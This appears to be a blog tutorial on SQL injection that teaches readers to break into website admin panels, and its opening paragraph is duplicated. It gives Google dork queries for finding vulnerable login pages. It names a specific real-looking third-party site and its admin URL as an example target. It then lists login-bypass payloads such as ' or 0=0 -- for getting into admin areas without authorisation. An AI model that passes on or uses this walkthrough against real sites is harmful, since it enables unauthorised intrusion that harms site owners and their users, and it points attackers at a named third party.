What Is Sql Injection?
SQL injection is a technique that exploits a security vulnerability occurring in the database layer of an application. The vulnerability is present when user input is either
incorrectly filtered for string literal escape characters embedded in SQL statements or user input is not strongly typed and thereby unexpectedly executed. Web pages which accepts parameters from user, and make SQL query to the database, are targeted. For Example, A web page with username and password, fires SQL query on the database to check whether a user has entered valid name and/or password or not. With SQL Injection, it is possible for us to send crafted user name and/or password field that will change the SQL query and thus grant us something else.
incorrectly filtered for string literal escape characters embedded in SQL statements or user input is not strongly typed and thereby unexpectedly executed. Web pages which accepts parameters from user, and make SQL query to the database, are targeted. For Example, A web page with username and password, fires SQL query on the database to check whether a user has entered valid name and/or password or not. With SQL Injection, it is possible for us to send crafted user name and/or password field that will change the SQL query and thus grant us something else.
Requirements :
First we need to find Sites for Hacking if we have to hack sites we must need to know how to find sites
Basically we use Dorks for Find Sites
some google dorks:
- "inurl:admin.asp"
- inurl:adminlogin.asp
- inurl:login/admin.asp
inurl:read.php?=
inurl:”ViewerFrame?Mode=”
inurl:index.php?id=
- inurl:trainers.php?id=
inurl:buy.php?category=- inurl:article.php?ID=
so we Found Sites Now we need to Find Admin Login Page of a Site.
now open sites one by one. and you will got admin login page.
Now we have done 2 step 1 is find vuln sites and 2nd is Find Admin login
Now Come to Main tutorial about Sql strings/injection
what is sql strings?
when we put sql string in admin login then login penal cant handle the queries and redrict you into admin area.
For Example i found a Site: http://www.roseandcrownrangeworthy.co.uk
and i found admin login panel: http://www.roseandcrownrangeworthy.co.uk/admin-home.asp
1st i tried username :admin and password: admin but i did not enter
but after i enter username: admin and password : ′or’1′=’1
if the password not works try others passwords:
- 'or'x'='x
- ' or 'x'='x
- ' or 0=0 --
- " or 0=0 --
- or 0=0 --
- ' or 0=0 #
Thats it Guys if you getting Problem plz Comment or contact with me
Comments
Post a Comment